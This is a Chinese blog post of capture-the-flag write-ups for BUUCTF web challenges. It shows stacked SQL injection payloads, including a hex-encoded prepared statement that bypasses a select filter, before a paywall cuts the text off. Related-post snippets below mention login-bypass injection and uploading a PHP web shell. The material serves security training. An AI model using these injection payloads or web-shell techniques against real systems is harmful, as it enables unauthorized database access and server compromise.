BUUCTF 部分web wp

原创

于 2024-05-21 08:59:21 发布 · 1.7k 阅读

39 ·

CC 4.0 BY-SA版权

文章标签：

#前端

BUUCTF WEB

0X01，[强网杯 2019]随便注

输入3时报错了，说明只有两个字符，接下来进行经典的查询环节

爆库：1';show databases;

爆表：1';show tables;

出来了两个数据库，一个一个查看

查询第一个数据库

1';show columns from words;

并没有出现和flag相关的东西，接下来查询第二个数据库

1';show columns from ‘1919810931114514’;

查询结果出来了flag字符，对这个flag，没有办法查看，只能借助别人的wp了，对大佬膜拜！

因为select被过滤了，所以先将select * from 1919810931114514进行16进制编码

再通过构造payload得

1;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

得到了flag；

0x02,[MRCTF2020]Ez_bypass

F12查看源代码

I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxx

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Tidy_Nan

关注关注

40
点赞
踩
39

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF-Web题解（持续更新中）

2301_80281749的博客

11-25

2527

查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#，就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件，于是得到flag：flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag：flag{fac64f95-3877-4f3e-9772-47bb8585b31a}

[CTF从0到1学习] BUUCTF WEB部分 wp（待完善）

qq_43710889的博客

11-27

4190

[CTF从0到1学习] BUUCTF WEB部分 wp（待完善）文章目录[CTF从0到1学习] BUUCTF WEB部分 wp（待完善）[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[ACTF2020 新生赛]Include[强网杯 2019]随便注 [HCTF 2018]WarmUp 首先看看网页源码呗 <?php highlight_file(__FILE__); class emmm {

参与评论您还未登录，请先登录后发表或查看评论

buuctf web wp

qq_63267612的博客

04-10

736

文章目录[极客大挑战 2019]EasySQL [极客大挑战 2019]EasySQL 打开后是一个登录框，直接尝试万能密码（用户名：1’ or 1=1 # 密码：随便输）登录得到flag 这里的万能密码是为什么呢？数据库中的查询语句： select id from users where username = '' or 1=1-- and password = '456' 又这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳

BUUCTF web wp

vegetable223的博客

11-28

467

BUUCTF-web warmup wp 首先认真阅读题目，一般题目信息有提示，有些还会有隐藏信息题目名是“warm up”，热身？，看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计，淦！发现都没学过，不过不要紧，不会我们可以百度啊！！！打开链接看到一张滑稽的表情，肯定不简单，直接f12查看源代码下面展示一些内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=

BUUCTF--Web篇详细wp

Aluxian_的博客

04-10

7491

BUUCTF--Web篇详细wp。

BUUCTF题目Web部分wp（持续更新）

最新发布

苦行僧的妖孽日常

08-10

1662

BUUCTF题目Web部分的writeup（持续更新）

BUUCTF web wp(一)

m0_55854679的博客

06-14

464

[HCTF 2018]WarmUp 打开题目链接，右键点击查看源码，发现source.php 访问source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.p

【BuuCTF】BabySQL WP

weixin_51019270的博客

01-11

289

【BuuCTF】BabySQL WP 一：判断闭合条件在用户名的位置输入1’显示错误，说明是单引号闭合。开始构造------》二：构造开始构造几遍以后构造出可以得到有用信息的网页看报错信息可以知道，我们的or被屏蔽掉了，去网上查了一下，是被replace给替换成空白字符了。根据前两题的经验，猜测列数是3。直接上联合查询看能不能报显示位。成功以后直接老办法，爆库，爆表，爆列。flag还是在password的最后一个。直接上图了拿到flag。提交然后结束。 ...

buuctf-web作业wp

qq_46266956的博客

03-05

1725

1x01题目-[HCTF 2018]WarmUp 知识点： php代码审计--php的基础知识总结：对字符串处理的一些函数： empty(),判断是否空 is_string(),判断是否为字符串 urldecode(),进行url解码 in_array(), mb_substr(),针对中文的字符串分割 mb_strpos(),针对中文的字符串出现的位置 1x02题目-[极客大挑战 2019]Havefun 知识点：无—超级简单的php代码审计吧算解题：百年一遇的简单题（看能不能抓住机会了，

BUUCTF web部分WP

Fab1an的博客

06-08

513

首先，你需要找到两个不同的字符串，它们的 MD5 哈希值相同，这可以通过哈希碰撞来实现。F12审查元素，或者ctrl + shift + c 审查元素，发现一段关于php的注释，内容为GET传参，如果cat等于dog的话，就echo打印什么东西。我们根据Linux的特性，用 ../../../../../很多个../去到根目录，然后打开ffffllllaaaagggg，就可以获得flag。数组的md5都是Null，所以它们满足MD5相等的条件。然后id的数组是1，gg的数组是2，满足值不相等的条件。

BUUCTF webwp（四）

m0_55854679的博客

07-28

362

[极客大挑战 2019]Knife 直接使用蚁剑连接即可得到flag。 [极客大挑战 2019]Http 题目给了一个链接，在新网页打开这个链接为三叶草安全技术小组的广告页。pic_center) 查看网页源码，发现了 onclick="return false" href="Secret.php"，访问Secret.php这个页面提示访问来源不对，此时我们可以通过Referer头来伪造链接来源。在Secret.php页面使用burp抓包，添加一行 referer:https://www.Sycse

BUUCTF web wp (五)

m0_55854679的博客

07-29

557

[ACTF2020 新生赛]Upload 打开题目链接点击灯泡即可看到隐隐约约的上传文件的框。上传一个含有一句话木马的php文件继续上传一个文件内容为一句话木马的jpg文件，发现使用蚁剑连接不成功，于是我们可以在上传jpg文件时使用burp抓包修改文件后缀为phtml 放包后发现页面提示上传的文件的绝对路径，且文件名被修改使用蚁剑连接时，注意用被修改过的文件名，连接成功后即可得到flag。 [极客大挑战 2019]BabySQL 又是前面熟悉的SQL注入的题目的背景图首先尝试万能密码登录，发现数据使

buuctf web题的wp

qq_51439282的博客

11-25

636

首先看到buuctf里的 [HCTF 2018]WarmUp 可以发现这道题是关于PHP和代码审计的，好家伙我都不会，有得我学了。打开链接可以看到一张滑稽脸那不就直接F12，打开查看器经过我的仔细观察发现没啥可用的东西，到后面开了题解才发现，oh~,原来要查看这个source.php的源代码（其实前面都说了这道题是关于php和代码审计的，我居然没反应过来）好家伙，就算知道了这个思路，我也不知道怎么查看这个php的源代码，经过一番查找，才发现我们只需要将它复制下来,然后在我们这个web题的链接后面加

BUUCTF web第一页WP

东隅的博客

05-13

887

目录 [极客大挑战 2019]EasySQL [HCTF 2018]WarmUp [极客大挑战 2019]Havefun [ACTF2020 新生赛]Include [强网杯 2019]随便注 [极客大挑战 2019]EasySQL payload: 1' or 1=1-- - 1 flag{deb9ccf8-479a-49c9-8412-6171f1c4b057} [HCTF 2018]WarmUp f12查看源码发现提示source.php, 进入获得源代码 .

BUUCTF web第三页WP

东隅的博客

10-03

1459

简单来说，就是mt_srand(seed)分发种子，相当于进行产生随机数的初始化，然后通过mt_rand函数获得种子，但是这个随机数并不是真正的随机，他是有可预测性的，如果我们能获得种子，就一定程度上可以获得产生的随机数，根据这个随机数进行验证的部分就不安全了。这个题的逻辑就是在注册的地方进行过滤，我们绕过过滤登陆进去以后，有一个改密码的功能，他是用双引号闭合用户名进行改密码操作的，我们注册好的用户名双引号结尾就可以闭合，后面跟我们进行报错注入的代码就好，至于改密码怎么改是随便填的，重点在注册好的用户名。

buuctf-web部分wp（更新一下）

a3uRa的一个窝

02-17

4064

前言（撮合看看吧因为直接复制的本地所以图片就没法显示了有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森求关注） b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过数组绕过 [极客大挑战 2019]Http 修改头 [...

BUUCTF-Web-随便注-wp

single7_的博客

12-14

461

0x01 知识点 SQL注入-堆叠注入 sql预处理语句巧用contact()函数绕过 0x02 知识铺垫在SQL中，分号（;）是用来表示一条sql语句的结束。在分号（;）结束一个sql语句后继续构造下一条语句，而后根据结果判断两条甚至多条SQL语句会不会一起执行？这种注入方式称为堆叠注入。 union injection（联合注入）是将两条语句合并在一起，两者之间有什么区别么？区别就在于 union 或者 union all 执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语

BUUCTF web第二页WP

东隅的博客

09-12

1173

写一下我得理解，首先这里的id是障眼法不用管，foreach遍历GET数组，传到complex()函数里，$str匹配$re这个正则表达式并且替换为\1，这里\1有特殊含义，e模式下我们的$str会被存入缓冲区，而这个1会导致回调缓冲区的内容，这个时候如果$str是我们想办法利用的getFlag()，再get传入cmd，代码执行不就成了么，最后要说那个$re写成全部匹配就好，像这样： \S*)/)，所以会一直递归，?)，也就是它把类似a(b(c()d()))）这种的全替换为空后只剩下;